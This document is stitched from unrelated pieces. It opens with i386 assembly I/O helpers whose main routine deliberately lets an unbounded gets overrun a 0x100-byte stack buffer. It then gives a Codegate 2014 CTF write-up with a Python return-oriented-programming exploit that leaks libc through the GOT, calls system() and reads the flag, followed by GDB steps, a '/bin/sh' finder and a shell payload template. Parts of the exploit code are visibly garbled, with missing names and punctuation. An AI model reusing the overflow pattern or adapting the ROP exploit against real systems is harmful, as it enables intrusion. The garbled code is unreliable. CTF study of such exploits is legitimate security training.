customio.inc

# customio.inc -- minimal libc-free I/O helpers for i386 Linux
# Syntax: GAS / AT&T.  System calls go through `int $0x80` with the
# number in %eax and arguments in %ebx, %ecx, %edx.
# Every routine below takes its arguments on the stack (first one at
# 0x8(%ebp)) and removes them itself with `ret $N`; callers push and do
# not clean up.
.set stdin, 0x00                 # file descriptor 0
.set stdout, 0x01                # file descriptor 1

.set syscall_read, 0x3           # i386 Linux read(fd, buf, count)
.set syscall_write, 0x4          # i386 Linux write(fd, buf, count)

.text
.globl strlen
.globl strcpy
.globl puts
.globl gets

#-----------------------------------------------------------------------
# size_t strlen(const char *s)            -- callee pops its argument
# In:    0x8(%ebp) = s (must be NUL-terminated)
# Out:   %eax = number of bytes before the NUL
# Saves: %esi; %ecx is not touched; clobbers %eax and flags
#-----------------------------------------------------------------------
strlen:
    push %ebp
    mov %esp, %ebp
    push %esi
    mov 0x8(%ebp), %esi          # esi walks the string
.Lstrlen_scan:
    cmpb $0x0, (%esi)            # stop at the terminator
    je .Lstrlen_done
    inc %esi
    jmp .Lstrlen_scan
.Lstrlen_done:
    mov %esi, %eax
    sub 0x8(%ebp), %eax          # length = end pointer - start pointer
    pop %esi
    leave
    ret $0x4

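#-----------------------------------------------------------------------
# size_t strcpy(char *dst, const char *src)   -- callee pops BOTH args
# In:    0x8(%ebp) = dst, 0xc(%ebp) = src (NUL-terminated)
# Out:   %eax = bytes copied, not counting the terminating NUL;
#        dst receives src's bytes up to and including the NUL
# Saves: %ecx, %esi, %edi; clobbers %eax and flags
# Note:  dst is unbounded -- the caller must guarantee room for
#        strlen(src) + 1 bytes.
# Fix:   the routine takes two stack arguments (8 bytes) but used to
#        return with `ret $0x4`, leaving one argument on the stack; a
#        caller that pushes both and relies on callee cleanup (see gets)
#        then popped its saved registers one slot off.  `ret $0x8`
#        matches the convention used by the other routines here.
#-----------------------------------------------------------------------
strcpy:
    push %ebp
    mov %esp, %ebp
    push %edi
    push %esi
    push %ecx
    xor %ecx, %ecx               # ecx = bytes copied so far
    mov 0x8(%ebp), %edi          # edi = dst
    mov 0xc(%ebp), %esi          # esi = src
.Lstrcpy_copy:
    movb (%esi), %al
    movb %al, (%edi)             # copy first, terminator included
    testb %al, %al
    je .Lstrcpy_done             # NUL copied -> done (not counted)
    inc %esi
    inc %edi
    inc %ecx
    jmp .Lstrcpy_copy
.Lstrcpy_done:
    mov %ecx, %eax
    pop %ecx
    pop %esi
    pop %edi
    leave
    ret $0x8                     # two stack arguments: pop 8 bytes, not 4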

#-----------------------------------------------------------------------
# const char *puts(const char *s)         -- callee pops its argument
# Writes strlen(s) bytes of s to stdout via write(2); no newline added.
# In:    0x8(%ebp) = s (NUL-terminated)
# Out:   %eax = s (the write(2) result is not returned)
# Saves: %ebx, %ecx, %edx; clobbers %eax and flags
#-----------------------------------------------------------------------
puts:
    push %ebp
    mov %esp, %ebp
    push %ebx
    push %ecx
    push %edx
    mov 0x8(%ebp), %ebx          # ebx = s; strlen leaves ebx untouched
    push %ebx
    call strlen                  # eax = length (strlen pops its arg)
    mov %ebx, %ecx               # ecx = buf
    mov %eax, %edx               # edx = count
    mov $stdout, %ebx            # ebx = fd
    mov $syscall_write, %eax
    int $0x80                    # eax = bytes written or -errno (ignored)
    mov %ecx, %eax               # return the string pointer
    pop %edx
    pop %ecx
    pop %ebx
    leave
    ret $0x4

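#-----------------------------------------------------------------------
# void gets(char *dst)                    -- callee pops its argument
# Reads up to 0x1000 bytes from stdin into a temporary stack buffer,
# NUL-terminates them, and copies the result into dst with strcpy.
# In:    0x8(%ebp) = dst
# Out:   nothing useful in %eax (clobbered); flags clobbered
# Saves: %ebx, %ecx, %edx
# Stack: 0x1004 bytes of temporary buffer
# Note:  like C gets(), dst is unbounded: up to 0x1000 bytes plus the
#        terminator are written to it, so the caller's buffer must be at
#        least 0x1001 bytes.  A shorter buffer (main's 0x100-byte frame
#        on this page) is overrun by a long line.
# Fixes: (1) the read data was never NUL-terminated, so strcpy ran on
#        into uninitialised stack bytes whenever the input had no NUL;
#        (2) strcpy as written on this page pops only 4 of its 8 argument
#        bytes, which shifted every register restore below by one slot --
#        %esp is now reset explicitly, so this works with either `ret`.
#-----------------------------------------------------------------------
gets:
    push %ebp
    mov %esp, %ebp
    sub $0x1004, %esp            # 0x1000 bytes of data + room for the NUL
    push %ebx
    push %ecx
    push %edx
    mov $0x1000, %edx            # edx = count
    lea -0x1004(%ebp), %ecx      # ecx = temporary buffer
    mov $stdin, %ebx             # ebx = fd
    mov $syscall_read, %eax
    int $0x80                    # eax = bytes read, 0 at EOF, or -errno
    test %eax, %eax
    jns .Lgets_term
    xor %eax, %eax               # read failed: treat as an empty line
.Lgets_term:
    movb $0x0, (%ecx,%eax)       # terminate right after the bytes read
    push %ecx                    # src = temporary buffer
    pushl 0x8(%ebp)              # dst = caller's buffer
    call strcpy
    lea -0x1010(%ebp), %esp      # back to the saved-register area, whatever strcpy popped
    pop %edx
    pop %ecx
    pop %ebx
    leave
    ret $0x4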


main.s

# main.s -- prompt, read one line, echo it back, using the helpers from
# customio.inc (textually included, so this is one translation unit).
.text
.include "customio.inc"
.globl main

#-----------------------------------------------------------------------
# int main(void)
# Frame: saved %edx at -4(%ebp); input buffer at -0x100(%ebp) .. -5(%ebp),
#        i.e. 0xfc bytes between the buffer start and the saved %edx.
# gets copies up to 0x1000 bytes plus a terminator into that buffer, so
# a line longer than 0xfc bytes overwrites the saved %edx, the saved
# %ebp and this function's return address.
# Relies on puts/gets popping their own argument and on gets leaving
# %edx intact (it is reused for the second puts call).
#-----------------------------------------------------------------------
main:
    push %ebp
    mov %esp, %ebp
    push %edx                    # keep edx (buffer pointer) across the calls below
    sub $0x100, %esp             # stack buffer for the input line
    lea -0x100(%ebp), %edx       # edx = &buf[0]
    push $string                 # absolute address: assumes a non-PIE link
    call puts                    # prompt (puts pops its argument)
    push %edx
    call gets                    # gets(buf) -- no length bound, see frame note
    push %edx
    call puts                    # echo the line back
    xor %eax, %eax               # return 0
    pop %edx
    leave
    ret

.section .rodata
string:
    .string "Input : "           # NUL-terminated prompt; puts measures it with strlen

Codegate 2014 Junior - Pwnable 300

-Remote Return Oriented Programming-



#!/usr/bin/python
#-*-coding:utf-8-*-
 
import socket
import struct
import time
 
#Endian Translator
= lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)
 
#PLT_GOT Addresses
send_plt = 0x08048900
send_got = 0x804b07c
recv_plt = 0x080488e0
recv_got = 0x0804b074
 
#Libc Addresses
recv_addr = None
system_addr = None
 
#Gadget/F_Stack Addresses
start_routine  = 0x08048b5b
ppppr = 0x0804917c
data_addr = 0x0804b088
 
#Misc
offset_send_system = 0xfb0 #Ubuntu 15.04 Vivid
passcode = None
 
print '''
[!] Codegate 2014 Nuclear Exploit [!]
~ By RevDev
~ Python 2.7
~ Local Exploit
'''
 
print "[!] Establishing Connection [!]"
= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1'1129))
print s
print ''
 
print "[!] Getting Passcode [!]"
 
s.recv(1024)
s.send("target\n")
s.recv(1024)
s.send("1.1/1.1\n")
s.recv(1024)
s.send("A"*512+"\n")
s.recv(1024)
passcode = s.recv(1024)
passcode = passcode[passcode.index('?', passcode.index('?')+1)+1:]
passcode = passcode.split("\n")[0]
print "Passcode : %s\n" %passcode
 
print "[!] Leaking Libc Function Address [!]"
s.send("launch\n")
s.recv(1024)
time.sleep(0.3)
s.send(passcode+"\n")
time.sleep(0.3)
s.recv(1024)
payload = "A"*528 + p(send_plt) + p(ppppr) + p(4+ p(send_got) + p(4+ p(0+ p(start_routine) + "\x90"*4 + p(4)
s.send(payload + "\n")
send_addr = up(s.recv(1024))
system_addr = int(send_addr[0]) + offset_send_system
print "_Send Address : 0x%x" %send_addr
print "_System Address : 0x%x\n" %system_addr
 
print "[!] Sending Exploit [!]"
payload = "A"*528 + p(recv_plt) + p(ppppr) + p(4+ p(data_addr) + p(13+ p(0+ p(system_addr) + "\x90"*4 + p (data_addr)
s.send(payload + "\n")
s.recv(1024)
s.send("cat key >&4\n"+"\x00")
s.recv(1024)
print "Flag : %s" %s.recv(1024)
s.close()



[System_Addr - GDB]

>b *func

>r

>p system


[Export Exploit_Addr 1]
int main()
{
        unsigned int addr;
        printf("\nSystem Addr : 0x");
        scanf("%x",&addr);
        while(memcmp((void*)addr,"/bin/sh",8))addr++;
        printf("\n<Calculated Result>\nExploit Addr : 0x%x\n\n",addr);

        return 0;

}


[Export Exploit_Addr 2]

>find &system, +99999999, /bin/sh


[Payload Example]

./filename `python -c 'print "\x90"*SizeOfBuf+"System_Addr"+"\x90"*4+"Exploit_Addr"'`

